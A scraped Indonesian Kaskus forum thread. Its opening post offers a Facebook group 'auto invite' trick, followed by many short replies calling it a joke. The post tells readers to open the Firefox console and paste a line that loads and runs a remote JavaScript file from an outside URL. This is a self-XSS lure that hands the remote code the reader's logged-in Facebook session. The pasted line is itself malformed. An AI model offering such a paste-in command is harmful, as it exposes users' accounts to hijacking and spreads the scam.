Main Content

1024
1024
KASKUS
51
244
https://www.kaskus.co.id/thread/000000000000000016529181/auto-invite-orang-ke-dalam-grup-facebook-berjuta-anggota-grup-d
Auto invite orang ke dalam grup facebook berjuta anggota grup ;d
yang punya grup facebook ingin banyak anggota? pAKAI AUTO INVITE INI

WAJIB MENGGUNAKAN MOZZILA FIREFOX

CARANYA :

PERTAMA MASUK KE GRUP YANG INGIN ANDA INVITE ORANG AGAR MASUK

1. TEKAN/PENCET TOMBOL CTRL+SHIFT+K
2. MASUKKIN KODE INI :

document.body.appendChild(document.createElement('script').src='http://hendromardikadork.googlecode.com/files/hendromardikadorkdanbretastevanny.js.txt';


3.TUNGGU HINGGA BEBERAPA SAATT

YANG SUDAH MEMAKAI COMMENT NANTI ANE KASIH SESUATU
ijin ngakak gan

lucu banget gan
hahaha
kocak abis dah jokenya ane gan
Salut..
kocak banget joke ente gan
Bisa aja lu gan bikin jokes
ini sih
udah bener bener lucu banget
this joke is fuckin LOL
ane ngakak2 sampe bochor bochor gan



Practice makes perfect, but nobodys perfect
wakakaka
yakin dah bener bener lucu
bisa aja ente bikin ane
Auto invite orang ke dalam grup facebook berjuta anggota grup ;d
Auto invite orang ke dalam grup facebook berjuta anggota grup ;d
Auto invite orang ke dalam grup facebook berjuta anggota grup ;d

Ane tunggu Review Hasilnya ajah deh gan....
Nah ini baru joke lucu bos
hahahaha.., geblek banget
emang bener bener
ngga ada yang bisa nandingi joke ente gan
Gokil banget gan asli
gag nahan
parah nih man
kocak abis gan
update trus gan jokes-nya
kocak abis gan update trus gan jokesnya ngakak

Yang ke 1 Kern banget gan

bacanya bikin ketawa nie gan kocak

hahahah asli gokil gan bikin ketawa nie kocak

kocak gan
ane bantu sundul